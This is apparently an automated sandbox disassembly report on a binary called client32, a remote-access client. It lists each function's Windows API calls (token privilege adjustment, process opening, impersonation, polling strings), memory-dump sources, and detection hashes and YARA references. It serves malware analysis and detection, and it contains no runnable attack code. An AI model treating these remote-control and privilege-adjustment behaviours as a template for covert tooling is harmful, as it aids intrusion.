                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                • API String ID: 1510130979-3441452530
                                                                                                • Opcode ID: c276eb11d042075f5f85af402a16148ba1aa1147f7a0a83ea9f5f0863f138776
                                                                                                • Instruction ID: d1bc5fe2c1ba19a834c669cd76c316bc502e5fe99fd8374da52c3475b37db92f
                                                                                                • Opcode Fuzzy Hash: c276eb11d042075f5f85af402a16148ba1aa1147f7a0a83ea9f5f0863f138776
                                                                                                • Instruction Fuzzy Hash: 7961B676904208AFDF14DFA4E854EEEB7B5FF49344F00852DE516A3681EB34A505CB61
                                                                                                Function 11116880 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                                • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000), ref: 111168EF
                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL), ref: 11116914
                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSettings,?,00000000,Client,silent,00000000,00000000), ref: 11116926
                                                                                                • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                                                • CoUninitialize.OLE32 ref: 111169E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                • String ID: SHELL32.DLL$SHGetSettings
                                                                                                • API String ID: 4195908086-2348320231
                                                                                                • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                                • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                                                • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                                • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                                                Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 11145F00: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11145F70
                                                                                                  • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                • _memset.LIBCMT ref: 11146055
                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                • API String ID: 4251163631-545709139
                                                                                                • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                                • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                                Function 11073680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                • API String ID: 2102423945-35127696
                                                                                                • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                                • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                                                • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                                • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                                                Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 110317A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID: Client32$NSMWClass$NSMWClass
                                                                                                • API String ID: 3192549508-611217420
                                                                                                • Opcode ID: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                                                • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                                                • Opcode Fuzzy Hash: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                                                • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                                                Function 1109ED30 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                                • EqualSid.ADVAPI32(?,0041D3B8,?,00000001,00000001), ref: 1109EDC3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InformationToken$AllocateEqualInitialize
                                                                                                • String ID:
                                                                                                • API String ID: 1878589025-0
                                                                                                • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                                • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                                                • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                                • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                                                Function 1109D860 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,986DAFD2,00080000,00000000,?), ref: 1109D88D
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID:
                                                                                                • API String ID: 2349140579-0
                                                                                                • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                                • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                                                • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                                • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                                                Function 1109D8F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                                                • CloseHandle.KERNEL32(?), ref: 1109D915
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                • String ID:
                                                                                                • API String ID: 81990902-0
                                                                                                • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                                • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                                                • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                                • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                                                Function 1102EBD0 Relevance: 252.2, APIs: 32, Strings: 111, Instructions: 1967windowthreadsleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • GetSystemMetrics.USER32(00002000,00000054,?,00000020,00000056,?,00000020), ref: 1102ED54
                                                                                                • FindWindowA.USER32 ref: 1102EF15
                                                                                                  • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32(?,000000FF,?,11031700,00000001,00000000), ref: 11110E76
                                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32((aB,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                  • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32((aB,?,11031700), ref: 11110EAC
                                                                                                  • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                                                • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                                                • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                                  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                                  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                                  • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000), ref: 11094F59
                                                                                                • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                                                • FindWindowA.USER32 ref: 1102EFFD
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                                                • LoadIconA.USER32(11000000,000004C1,?,?,?,View,Client,Bridge), ref: 1102F521
                                                                                                • LoadIconA.USER32(11000000,000004C2,?,?,?,View,Client,Bridge), ref: 1102F531
                                                                                                • DestroyCursor.USER32(00000000,?,?,?,View,Client,Bridge), ref: 1102F557
                                                                                                • DestroyCursor.USER32(00000000,?,?,?,View,Client,Bridge), ref: 1102F568
                                                                                                  • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                                  • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                                  • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                                  • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                                                • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                                                • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                                                • DispatchMessageA.USER32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 11030136
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110303D4
                                                                                                • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                                                • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                                                • SetWindowPos.USER32(000103BC,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 11030449
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110304CA
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                                  • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,986DAFD2,?,?,00000000), ref: 1112909A
                                                                                                  • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                                  • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
